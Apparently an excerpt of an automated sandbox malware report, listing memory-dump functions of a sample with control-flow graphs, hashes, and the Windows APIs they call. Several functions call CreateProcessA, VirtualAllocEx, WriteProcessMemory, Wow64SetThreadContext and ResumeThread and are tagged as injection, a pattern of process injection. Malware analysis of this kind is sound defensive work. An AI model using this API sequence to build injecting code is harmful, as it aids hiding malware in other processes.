                          control_flow_graph 2046 6ce3440-6ce344d 2047 6ce354d-6ce3551 2046->2047 2048 6ce3453-6ce347e 2046->2048 2052 6ce3480-6ce348f 2048->2052 2053 6ce3491-6ce349f 2048->2053 2052->2053 2056 6ce34ab-6ce34b9 2053->2056 2057 6ce34a1-6ce34a9 2053->2057 2061 6ce34bf-6ce34cb 2056->2061 2062 6ce3552-6ce3554 2056->2062 2057->2056 2067 6ce34dc-6ce34fa 2061->2067 2068 6ce34cd-6ce34d4 2061->2068 2063 6ce3556-6ce357b 2062->2063 2064 6ce3582-6ce3620 2062->2064 2063->2064 2093 6ce365f-6ce3663 2064->2093 2094 6ce3622-6ce362c 2064->2094 2079 6ce34fc-6ce3501 2067->2079 2080 6ce3503 2067->2080 2068->2067 2082 6ce350a-6ce3511 2079->2082 2080->2082 2101 6ce3514 call 6ce39dc 2082->2101 2102 6ce3514 call 6ce39f0 2082->2102 2084 6ce3517-6ce354c 2094->2093 2096 6ce362e-6ce363c 2094->2096 2098 6ce363e 2096->2098 2099 6ce3645-6ce3657 2096->2099 2098->2099 2099->2093 2101->2084 2102->2084
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$Hiq
                          • API String ID: 0-2459830773
                          • Opcode ID: 9d78e2c61ad71aa47ff2a05615ed33bd8e2289620d699181df2a5918b7199524
                          • Instruction ID: c2aa8eae4366c5aff5475c0ffb95dbb714776a281f5fa259439eef5176cbc9ad
                          • Opcode Fuzzy Hash: 9d78e2c61ad71aa47ff2a05615ed33bd8e2289620d699181df2a5918b7199524
                          • Instruction Fuzzy Hash: 5051BE747006004FC799AB7E989462ABBEBFFC8310754896DD54BCB792DE34EC028B51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CEE408 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2103 6cee408-6cee42f 2104 6cee468-6cee46d 2103->2104 2105 6cee431-6cee434 2104->2105 2106 6cee43d-6cee454 2105->2106 2107 6cee436 2105->2107 2120 6cee564-6cee56e 2106->2120 2132 6cee45a-6cee466 2106->2132 2107->2104 2107->2106 2108 6cee4be-6cee4ca 2107->2108 2109 6cee4de-6cee4e6 2107->2109 2110 6cee46f-6cee47d 2107->2110 2111 6cee4cd-6cee4d9 2107->2111 2112 6cee54a-6cee551 2107->2112 2113 6cee4a8-6cee4b9 2107->2113 2114 6cee522-6cee524 2107->2114 2115 6cee4a1-6cee4a6 2107->2115 2108->2111 2122 6cee4ed-6cee4ef 2109->2122 2123 6cee4e8-6cee4ec 2109->2123 2116 6cee47f 2110->2116 2117 6cee486-6cee48d 2110->2117 2111->2105 2112->2120 2121 6cee553-6cee55f 2112->2121 2113->2105 2118 6cee53e-6cee547 2114->2118 2119 6cee526-6cee52c 2114->2119 2115->2105 2125 6cee484 2116->2125 2117->2120 2126 6cee493-6cee49f 2117->2126 2127 6cee52e 2119->2127 2128 6cee530-6cee53c 2119->2128 2121->2105 2130 6cee50b-6cee512 2122->2130 2131 6cee4f1-6cee4f8 2122->2131 2123->2122 2125->2105 2126->2125 2127->2118 2128->2118 2130->2120 2133 6cee514-6cee520 2130->2133 2131->2120 2135 6cee4fa-6cee501 2131->2135 2132->2105 2136 6cee506 2133->2136 2135->2136 2136->2105
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: l.eq$l.eq
                          • API String ID: 0-3786989441
                          • Opcode ID: b628b5e429943b65e0e1bbe8729bbe0839fbf05b80b09698892894ea97987872
                          • Instruction ID: 5241feba2918dc90462cae68b04bc8204fbd50ce685d6f7e9fef57ac2743cba2
                          • Opcode Fuzzy Hash: b628b5e429943b65e0e1bbe8729bbe0839fbf05b80b09698892894ea97987872
                          • Instruction Fuzzy Hash: E941DF71905219CFDB90CFAAC8406BAB7F1FF48350F44852BE566DB2A1E334D941C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 06CEC3C0 Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2138 6cec3c0-6cec3ee 2139 6cec421-6cec437 2138->2139 2141 6cec3f0-6cec3f3 2139->2141 2142 6cec3fc-6cec41f 2141->2142 2143 6cec3f5 2141->2143 2142->2141 2143->2139 2143->2142 2144 6cec4ec-6cec51a 2143->2144 2145 6cec454-6cec476 2143->2145 2146 6cec4e4-6cec4e9 2143->2146 2147 6cec4b0-6cec4df 2143->2147 2159 6cec481-6cec4ab 2145->2159 2146->2144 2147->2141 2159->2141
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147085860.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ce0000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8iq$8iq
                          • API String ID: 0-767271662
                          • Opcode ID: b1eb38504ddded9e7cd033f53990be7beb6bc75c5ba728bd52f6f0e8eae8ffa2
                          • Instruction ID: dc5cacf9594ed12a36a218c5561e753dd66db7d044f0139b28b9a0a284c7df23
                          • Opcode Fuzzy Hash: b1eb38504ddded9e7cd033f53990be7beb6bc75c5ba728bd52f6f0e8eae8ffa2
                          • Instruction Fuzzy Hash: 0831CE71A00614DFD7809BADD846AFE73B1FB41301F44862AE522EB281C774CA05CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 071417D0 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2162 71417d0-71417ee 2163 71417f5-71417fa 2162->2163 2164 71417f0 2162->2164 2165 7141803 2163->2165 2164->2163 2166 714180a-7141826 2165->2166 2167 714182f-7141830 2166->2167 2168 7141828 2166->2168 2171 714189d-71418a1 2167->2171 2168->2165 2168->2167 2169 7141876-7141898 2168->2169 2170 7141832-7141846 2168->2170 2168->2171 2169->2166 2173 7141848-7141857 2170->2173 2174 7141859-7141860 2170->2174 2175 7141867-7141874 2173->2175 2174->2175 2175->2166
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2147443822.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                          • Associated: 00000000.00000002.2147410922.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID: 3H5$3H5
                          • API String ID: 0-2752242361
                          • Opcode ID: 944e5bf3bb6ce8dc163b4f8da195e5d1780ccf607b2b6d6aa3874dbf1cc78015
                          • Instruction ID: 95695fb891f76e861501ae94ecf2dda2f46e0205d813bc36779a545fcb22b28d
                          • Opcode Fuzzy Hash: 944e5bf3bb6ce8dc163b4f8da195e5d1780ccf607b2b6d6aa3874dbf1cc78015
                          • Instruction Fuzzy Hash: 12211BB0D1120AEFCB48CFA9C541AAEFBF1FF89300F14C56AC508A7254E7349A85DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891C04 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2176 2891c04-2891ca5 2179 2891cde-2891cfe 2176->2179 2180 2891ca7-2891cb1 2176->2180 2185 2891d00-2891d0a 2179->2185 2186 2891d37-2891d66 2179->2186 2180->2179 2181 2891cb3-2891cb5 2180->2181 2183 2891cd8-2891cdb 2181->2183 2184 2891cb7-2891cc1 2181->2184 2183->2179 2187 2891cc3 2184->2187 2188 2891cc5-2891cd4 2184->2188 2185->2186 2189 2891d0c-2891d0e 2185->2189 2196 2891d68-2891d72 2186->2196 2197 2891d9f-2891e59 CreateProcessA 2186->2197 2187->2188 2188->2188 2190 2891cd6 2188->2190 2191 2891d31-2891d34 2189->2191 2192 2891d10-2891d1a 2189->2192 2190->2183 2191->2186 2194 2891d1c 2192->2194 2195 2891d1e-2891d2d 2192->2195 2194->2195 2195->2195 2198 2891d2f 2195->2198 2196->2197 2199 2891d74-2891d76 2196->2199 2208 2891e5b-2891e61 2197->2208 2209 2891e62-2891ee8 2197->2209 2198->2191 2201 2891d99-2891d9c 2199->2201 2202 2891d78-2891d82 2199->2202 2201->2197 2203 2891d84 2202->2203 2204 2891d86-2891d95 2202->2204 2203->2204 2204->2204 2205 2891d97 2204->2205 2205->2201 2208->2209 2219 2891ef8-2891efc 2209->2219 2220 2891eea-2891eee 2209->2220 2222 2891f0c-2891f10 2219->2222 2223 2891efe-2891f02 2219->2223 2220->2219 2221 2891ef0 2220->2221 2221->2219 2225 2891f20-2891f24 2222->2225 2226 2891f12-2891f16 2222->2226 2223->2222 2224 2891f04 2223->2224 2224->2222 2227 2891f36-2891f3d 2225->2227 2228 2891f26-2891f2c 2225->2228 2226->2225 2229 2891f18 2226->2229 2230 2891f3f-2891f4e 2227->2230 2231 2891f54 2227->2231 2228->2227 2229->2225 2230->2231 2233 2891f55 2231->2233 2233->2233
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02891E46
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 07ee2177d8e2ba52d4e2c07c82e1174e6b3080f236a01dd16db555259df70f70
                          • Instruction ID: 01b9411fa65524defde5637decced1303f4c99f0ba40157c179540b00b417761
                          • Opcode Fuzzy Hash: 07ee2177d8e2ba52d4e2c07c82e1174e6b3080f236a01dd16db555259df70f70
                          • Instruction Fuzzy Hash: C6A16D79D0421A8FEF20CF68C844BEDBBB2AF48314F188569D81DE7290DB749985CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891C10 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02891E46
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: db1a743d7bd5707615d4516287c49bfee9c31ce6bad874811d96b1e7871195a7
                          • Instruction ID: bf04ad8f276767c202159ba2450964818b6a453586a5c39ec8518597417b22d1
                          • Opcode Fuzzy Hash: db1a743d7bd5707615d4516287c49bfee9c31ce6bad874811d96b1e7871195a7
                          • Instruction Fuzzy Hash: B3915A79D0421A8FEF24CF68C884BEDBBB2AF49314F188569D80DE7250DB749985CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0287B028 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0287B27E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: c5db288564300b9a629e20efb63bec1b98bac3ae370cea0c69383ed17132d0e9
                          • Instruction ID: 67b32ad4a283b42aa387b61196128a76d0e3a0e4735a4d2daf9ea7e2e0e95ce5
                          • Opcode Fuzzy Hash: c5db288564300b9a629e20efb63bec1b98bac3ae370cea0c69383ed17132d0e9
                          • Instruction Fuzzy Hash: F4712378A00B058FDB24DF6AD44475ABBF2FF88308F008929D49AD7A50DB75E945CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0287590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 028759C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: eda75eee044417301b3913858a312e92a4ea00acfd44856c78f4eb3134821a93
                          • Instruction ID: 3bb182583d7329c869b8a0e8d10506431b46c39d1fde81e130aa619a24fe9a3f
                          • Opcode Fuzzy Hash: eda75eee044417301b3913858a312e92a4ea00acfd44856c78f4eb3134821a93
                          • Instruction Fuzzy Hash: 6A41F2B5C00719CBDB24CFA9C884B8DFBB1BF49304F60816AD808AB251DB75694ACF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028744C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 028759C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: 96ec3b01d71f6c0408aea1cd79312c5ceee5c6407d544f9ae29505775adc8172
                          • Instruction ID: 8bf63d0a3ab01e42793f9e65dcba026150647a8db5ba07767e7f2b2fc8cc3794
                          • Opcode Fuzzy Hash: 96ec3b01d71f6c0408aea1cd79312c5ceee5c6407d544f9ae29505775adc8172
                          • Instruction Fuzzy Hash: 9E41E2B4C00719CBDB24CFA9C844B8DBBB5BF48304F608169D508AB261DB75694ACF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02875A84 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d54af49934d92f2d7f1d59ef20b5b30d7df0e361c4383caea79df45309595d9d
                          • Instruction ID: c1ff9d743a4b657cb39298a77a9af6752d91db44cb9c1ffd8e9784ded899965b
                          • Opcode Fuzzy Hash: d54af49934d92f2d7f1d59ef20b5b30d7df0e361c4383caea79df45309595d9d
                          • Instruction Fuzzy Hash: 9A31E0B9804248CFEB00CFA8C854BADBFF0EF06304F944259C419AB261C779A94ACB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891980 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02891A18
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 6d8fb032abc809c960fca2ec3ce6b6e50305c2fa3a70668bd760dfe3c0bceefd
                          • Instruction ID: 632cf59140db6a95dd282ae2926639867525f3086816e3bad5b3e8bdf63b5f35
                          • Opcode Fuzzy Hash: 6d8fb032abc809c960fca2ec3ce6b6e50305c2fa3a70668bd760dfe3c0bceefd
                          • Instruction Fuzzy Hash: 182157769003499FDF10CFA9C985BEEBBF5FF48310F14842AE918A7241C7789954DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891988 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02891A18
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 34150611f1f36fe299802c73d218680013a50c4d01ab4ad1281aad262add87f5
                          • Instruction ID: f9afb85a1f7af0422797f2d0ac0dd537e98243c807891d78238ec4e28f28a705
                          • Opcode Fuzzy Hash: 34150611f1f36fe299802c73d218680013a50c4d01ab4ad1281aad262add87f5
                          • Instruction Fuzzy Hash: E52166759003099FCF10CFA9C985BEEBBF5FF48320F14842AE918A7240C7789954CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891A71 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02891AF8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: e64a39ca6bf14f0be2df7399656800ccf5f291253905593dd6568838b219fc00
                          • Instruction ID: 07fb5a0ee4c90b71ada3eea42b2ccb1893df1a3e05abf5352fccfe0226cff3a7
                          • Opcode Fuzzy Hash: e64a39ca6bf14f0be2df7399656800ccf5f291253905593dd6568838b219fc00
                          • Instruction Fuzzy Hash: FD2139B59003499FDB10CFA9C985AEEBBF5FF48320F148429E519A7240D7789945DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028913B0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02891436
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: e4586b77d46a88877272e1ad881608024d1309576065542edc1276eeb133b68a
                          • Instruction ID: 818a52a5d99fe3d0e61aa603e5b9dec68f339d1e98eff8582def042ae269aee8
                          • Opcode Fuzzy Hash: e4586b77d46a88877272e1ad881608024d1309576065542edc1276eeb133b68a
                          • Instruction Fuzzy Hash: 02215975D0030A8FDB10CFAAC8857EEBBF4EF89320F148429D459A7241CB789945CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0287D038 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0287D4CE,?,?,?,?,?), ref: 0287D58F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 7967489c7e4ae45ba16a7d35ab089756bdb500057bb2fc022a57b98e3e65a615
                          • Instruction ID: fcbe52a121d07a6b641266cd47ba0065dabf8feddf723d9c4fe7b840e3cfeed1
                          • Opcode Fuzzy Hash: 7967489c7e4ae45ba16a7d35ab089756bdb500057bb2fc022a57b98e3e65a615
                          • Instruction Fuzzy Hash: C621E3B99002199FDB10CFAAD984ADEBFF8EF48314F14841AE918A7310D374A944DFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891A78 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02891AF8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 658afaf1303dfbae7f6ffabaea47d1b7fe48887ccd63fa0d93a1f17c6f4512ae
                          • Instruction ID: cff3c757d5e206616a101a35fee4400a7ec148bcfcc982d94bb26563935d3552
                          • Opcode Fuzzy Hash: 658afaf1303dfbae7f6ffabaea47d1b7fe48887ccd63fa0d93a1f17c6f4512ae
                          • Instruction Fuzzy Hash: F7214875D003499FDF10CFAAC984AEEBBF5FF48320F14842AE519A7240C7789940DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028913B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02891436
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 6ca2bfdf40b011a12edef7f7c147236d7e59445d1bfec935cacca35be70bfe4b
                          • Instruction ID: c48d504b32dea03ab71100c24f4921ef197156d9df8c5419423495ba17feb057
                          • Opcode Fuzzy Hash: 6ca2bfdf40b011a12edef7f7c147236d7e59445d1bfec935cacca35be70bfe4b
                          • Instruction Fuzzy Hash: FC216575D003098FDB10CFAAC8847AEBBF4EF89320F14842AD419A7241CB78A945CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028918C0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02891936
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 13b8bd1ef69df96905a75e38fb97c281e1c3cf4f868f5076876037630ebb78c8
                          • Instruction ID: b8e10ec76fbef69b7a18ca88e547d7bad90ebe22aca41c9da4c83b837e4d513d
                          • Opcode Fuzzy Hash: 13b8bd1ef69df96905a75e38fb97c281e1c3cf4f868f5076876037630ebb78c8
                          • Instruction Fuzzy Hash: 0811477990020A9FCB20DFA9C845ADEBFF5EF88320F248419E529A7250CB759941CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0287B498 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0287B2F9,00000800,00000000,00000000), ref: 0287B50A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 38fd11f302e5bc159a39c59a329b303769c53a05417fe7fd19648378edbe38cd
                          • Instruction ID: 067995400b9cd2b4f478a7f54e56a179a6cfea2c40664e19075863ed294267cb
                          • Opcode Fuzzy Hash: 38fd11f302e5bc159a39c59a329b303769c53a05417fe7fd19648378edbe38cd
                          • Instruction Fuzzy Hash: 18113ABAC003499FDB10CFAAC844ADEFBF5EB49314F14841ED519A7200C375A545CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0287ACDC Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0287B2F9,00000800,00000000,00000000), ref: 0287B50A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142626073.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2870000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: b6e18eb3f10f0a98719007bb290b62e46f32076bf9e98613472e1af283c2350c
                          • Instruction ID: 5a826428bcaf5c54f7ac4d7e3116916f4d665cda9c3b2a2460b3a8c9ea9fa63c
                          • Opcode Fuzzy Hash: b6e18eb3f10f0a98719007bb290b62e46f32076bf9e98613472e1af283c2350c
                          • Instruction Fuzzy Hash: B611E7BA9003499FDB10CF9AC848ADEFBF5EB48314F14842AD519A7210C375A545CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02891301 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 4715cb656608e1d745e31d97c93de3d0d4d6376ae80b1c45d6a9c10b4c1c0d33
                          • Instruction ID: 8804f2618feeca37a72a8237b30a0ff20403b201358b1b59efa1dfafdcf041d8
                          • Opcode Fuzzy Hash: 4715cb656608e1d745e31d97c93de3d0d4d6376ae80b1c45d6a9c10b4c1c0d33
                          • Instruction Fuzzy Hash: F0115B75D043098FDB20DFAAC8457DEFBF5EF88320F248419D519A7240CB796945CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028918C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02891936
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 9f932e18496b7f7f8ae3a213ddcd30bfb6f3151ec585f1971abfc6af0f6b47f5
                          • Instruction ID: 35d2f78612b449c2b3afa53c76d0edf5686fe9504c53240b56b187d69db184c1
                          • Opcode Fuzzy Hash: 9f932e18496b7f7f8ae3a213ddcd30bfb6f3151ec585f1971abfc6af0f6b47f5
                          • Instruction Fuzzy Hash: 351137769002499FDF20DFAAC844ADFBFF5EF88320F148419E519A7250CB75A944DFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028959CC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02896921,?,?), ref: 02896AC8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2142688034.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2890000_SecuriteInfo.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0
                          • Opcode ID: ecded9eb342be045d09a5343366121aa67d7dbd129b6be4f179e99cf7aa8a802
                          • Instruction ID: 08f3e376d4192de72487f42b8ef756a59d2c54a48819b74e983faf3c570e0164
                          • Opcode Fuzzy Hash: ecded9eb342be045d09a5343366121aa67d7dbd129b6be4f179e99cf7aa8a802
                          • Instruction Fuzzy Hash: C31158B98003198FDB10CF99C544BEEBBF4EB48320F14841AD918A7340D338A944CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02896A69 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                          Download Yara Rule
